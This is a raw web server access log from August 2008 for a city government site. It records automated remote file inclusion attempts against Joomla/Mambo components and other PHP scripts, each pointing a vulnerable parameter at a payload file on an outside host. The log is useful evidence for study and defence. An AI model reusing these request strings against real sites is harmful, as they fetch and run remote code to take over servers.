213.113.108.116 - - [31/Aug/2008:17:02:08 -0700] "GET /logs/access_080301.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
213.113.108.116 - - [31/Aug/2008:17:02:09 -0700] "GET /logs/access_080301.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
213.113.108.116 - - [31/Aug/2008:17:02:09 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
213.113.108.116 - - [31/Aug/2008:17:02:09 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
213.113.108.116 - - [31/Aug/2008:17:02:09 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
213.113.108.116 - - [31/Aug/2008:17:02:09 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
213.113.108.116 - - [31/Aug/2008:17:02:11 -0700] "GET /logs/access_080301.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
213.113.108.116 - - [31/Aug/2008:17:02:12 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
213.113.108.116 - - [31/Aug/2008:17:02:12 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
84.241.0.10 - - [31/Aug/2008:17:04:34 -0700] "GET /logs/access_080731.log//components/com_flyspray/startdown.php?file=http://www.shkupi.nu/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
217.147.236.10 - - [31/Aug/2008:17:06:14 -0700] "GET /logs/access_080330.log//components/com_simpleboard/image_upload.php?sbp=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
217.147.236.10 - - [31/Aug/2008:17:06:16 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
217.147.236.10 - - [31/Aug/2008:17:06:17 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:17:07:12 -0700] "GET /logs/access_080301.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:17:07:12 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
75.0.18.81 - - [31/Aug/2008:17:07:12 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:17:07:14 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
75.0.18.81 - - [31/Aug/2008:17:07:19 -0700] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "cityofarkadelphia.com"
217.147.236.10 - - [31/Aug/2008:17:08:13 -0700] "GET /logs/access_080201.log//components/com_simpleboard/image_upload.php?sbp=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:17:09:23 -0700] "GET /Exchange/include.php?webappcfg[APPPATH]=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:17:09:23 -0700] "GET /logs/Exchange/include.php?webappcfg[APPPATH]=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:17:09:23 -0700] "GET /logs/access_080330.log/Exchange/include.php?webappcfg[APPPATH]=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:17:09:24 -0700] "GET /logs/access_080329.log/Exchange/include.php?webappcfg[APPPATH]=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
207.210.89.58 - - [31/Aug/2008:17:09:35 -0700] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.210.89.58 - - [31/Aug/2008:17:09:36 -0700] "GET //?path%5Bdocroot%5D=http://www.marioni.info/alb2?? HTTP/1.1" 200 917 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.210.89.58 - - [31/Aug/2008:17:09:36 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.marioni.info/alb2?? HTTP/1.1" 200 4089 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.210.89.58 - - [31/Aug/2008:17:09:40 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.210.89.58 - - [31/Aug/2008:17:09:40 -0700] "GET //skin/zero_vote/error.php?dir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
213.113.108.116 - - [31/Aug/2008:17:10:20 -0700] "GET /logs/access_080401.log/Exchange/include.php?webappcfg[APPPATH]=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
213.113.108.116 - - [31/Aug/2008:17:10:22 -0700] "GET /logs/Exchange/include.php?webappcfg[APPPATH]=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
213.113.108.116 - - [31/Aug/2008:17:10:22 -0700] "GET /Exchange/include.php?webappcfg[APPPATH]=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
207.210.89.58 - - [31/Aug/2008:17:10:22 -0700] "GET /logs/access_071201.log//?path%5Bdocroot%5D=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
213.113.108.116 - - [31/Aug/2008:17:10:24 -0700] "GET /logs/access_080330.log/Exchange/include.php?webappcfg[APPPATH]=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:17:12:28 -0700] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:17:12:28 -0700] "GET //?path%5Bdocroot%5D=http://www.marioni.info/alb2?? HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:17:12:28 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.marioni.info/alb2?? HTTP/1.1" 200 4089 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:17:13:41 -0700] "GET /logs/access_071201.log//?path%5Bdocroot%5D=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
190.41.11.250 - - [31/Aug/2008:17:14:19 -0700] "GET /logs/Exchange/include.php?webappcfg[APPPATH]=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
190.41.11.250 - - [31/Aug/2008:17:14:19 -0700] "GET /Exchange/include.php?webappcfg[APPPATH]=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
190.41.11.250 - - [31/Aug/2008:17:14:19 -0700] "GET /logs/access_080330.log/Exchange/include.php?webappcfg[APPPATH]=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
190.41.11.250 - - [31/Aug/2008:17:14:20 -0700] "GET /logs/access_080329.log/Exchange/include.php?webappcfg[APPPATH]=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.216.26.101 - - [31/Aug/2008:17:20:26 -0700] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [31/Aug/2008:17:20:26 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [31/Aug/2008:17:20:26 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
67.212.173.42 - - [31/Aug/2008:17:21:08 -0700] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
67.212.173.42 - - [31/Aug/2008:17:21:08 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
67.212.173.42 - - [31/Aug/2008:17:21:08 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
66.216.26.101 - - [31/Aug/2008:17:21:54 -0700] "GET /logs/access_080330.log//modules/TotalCalendar/about.php?inc_dir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
67.212.173.42 - - [31/Aug/2008:17:22:55 -0700] "GET /logs/access_080330.log//modules/TotalCalendar/about.php?inc_dir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
74.50.106.226 - - [31/Aug/2008:17:22:55 -0700] "GET /logs//?custompluginfile[]=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 200 4089 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.50.106.226 - - [31/Aug/2008:17:22:55 -0700] "GET //?custompluginfile[]=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.50.106.226 - - [31/Aug/2008:17:22:55 -0700] "GET /logs/access_080201.log//?custompluginfile[]=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.212.173.42 - - [31/Aug/2008:17:23:54 -0700] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
67.212.173.42 - - [31/Aug/2008:17:23:54 -0700] "GET //?path%5Bdocroot%5D=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 200 917 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
67.212.173.42 - - [31/Aug/2008:17:23:54 -0700] "GET /logs//?path%5Bdocroot%5D=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 200 4089 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
66.185.168.98 - - [31/Aug/2008:17:24:00 -0700] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.185.168.98 - - [31/Aug/2008:17:24:00 -0700] "GET //?path%5Bdocroot%5D=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 200 917 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.185.168.98 - - [31/Aug/2008:17:24:00 -0700] "GET /logs//?path%5Bdocroot%5D=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 200 4089 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [31/Aug/2008:17:24:05 -0700] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [31/Aug/2008:17:24:05 -0700] "GET //?path%5Bdocroot%5D=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 200 917 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [31/Aug/2008:17:24:05 -0700] "GET /logs//?path%5Bdocroot%5D=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 200 4089 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
67.212.173.42 - - [31/Aug/2008:17:24:34 -0700] "GET /logs/access_071201.log//?path%5Bdocroot%5D=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
66.185.168.98 - - [31/Aug/2008:17:24:43 -0700] "GET /logs/access_071201.log//?path%5Bdocroot%5D=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [31/Aug/2008:17:24:45 -0700] "GET /logs/access_071201.log//?path%5Bdocroot%5D=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
84.21.71.133 - - [31/Aug/2008:17:25:30 -0700] "GET //?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
84.21.71.133 - - [31/Aug/2008:17:25:30 -0700] "GET /logs//?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 200 4089 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.185.168.98 - - [31/Aug/2008:17:25:39 -0700] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.185.168.98 - - [31/Aug/2008:17:25:40 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.185.168.98 - - [31/Aug/2008:17:25:40 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.185.168.98 - - [31/Aug/2008:17:27:11 -0700] "GET /logs/access_080330.log//modules/TotalCalendar/about.php?inc_dir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:17:29:00 -0700] "GET /logs/access.log/errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:17:29:00 -0700] "GET /errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:17:29:01 -0700] "GET /logs/errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
84.21.71.133 - - [31/Aug/2008:17:32:33 -0700] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
84.21.71.133 - - [31/Aug/2008:17:32:33 -0700] "GET /logs/access_071201.log//?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
204.15.10.22 - - [31/Aug/2008:17:38:27 -0700] "GET /comments-display-tpl.php?language_file=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
204.15.10.22 - - [31/Aug/2008:17:38:28 -0700] "GET /comments-display-tpl.php?language_file=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
204.15.10.22 - - [31/Aug/2008:17:38:29 -0700] "GET /comments-display-tpl.php?language_file=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
204.15.10.22 - - [31/Aug/2008:17:38:40 -0700] "GET /comments-display-tpl.php?language_file=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:17:39:02 -0700] "GET /comments-display-tpl.php?language_file=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:17:39:02 -0700] "GET /logs/access_080329.log/comments-display-tpl.php?language_file=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:17:39:03 -0700] "GET /logs/access_071231.log/comments-display-tpl.php?language_file=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:17:39:03 -0700] "GET /logs/comments-display-tpl.php?language_file=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
190.41.11.250 - - [31/Aug/2008:17:54:11 -0700] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
190.41.11.250 - - [31/Aug/2008:17:54:13 -0700] "GET //?path%5Bdocroot%5D=http://www.marioni.info/alb2?? HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
190.41.11.250 - - [31/Aug/2008:17:54:15 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.marioni.info/alb2?? HTTP/1.1" 200 4089 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
190.41.11.250 - - [31/Aug/2008:17:56:15 -0700] "GET /logs/access_071201.log//?path%5Bdocroot%5D=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
147.102.106.10 - - [31/Aug/2008:18:06:46 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
147.102.106.10 - - [31/Aug/2008:18:06:46 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
147.102.106.10 - - [31/Aug/2008:18:06:57 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
147.102.106.10 - - [31/Aug/2008:18:06:57 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
85.119.243.57 - - [31/Aug/2008:18:07:07 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
85.119.243.57 - - [31/Aug/2008:18:07:07 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
147.102.106.10 - - [31/Aug/2008:18:07:09 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
147.102.106.10 - - [31/Aug/2008:18:07:09 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
147.102.106.10 - - [31/Aug/2008:18:07:09 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
147.102.106.10 - - [31/Aug/2008:18:07:25 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
147.102.106.10 - - [31/Aug/2008:18:07:25 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
147.102.106.10 - - [31/Aug/2008:18:07:25 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
85.119.243.57 - - [31/Aug/2008:18:07:25 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
85.119.243.57 - - [31/Aug/2008:18:07:25 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
85.119.243.57 - - [31/Aug/2008:18:07:26 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
74.50.106.226 - - [31/Aug/2008:18:07:44 -0700] "GET /logs/access.log//classes/adodbt/sql.php?classes_dir=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.50.106.226 - - [31/Aug/2008:18:07:45 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.50.106.226 - - [31/Aug/2008:18:07:49 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.50.106.226 - - [31/Aug/2008:18:08:03 -0700] "GET /logs/access_080330.log//classes/adodbt/sql.php?classes_dir=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.119.243.57 - - [31/Aug/2008:18:08:46 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
85.119.243.57 - - [31/Aug/2008:18:08:46 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
85.119.243.57 - - [31/Aug/2008:18:09:00 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
85.119.243.57 - - [31/Aug/2008:18:09:00 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
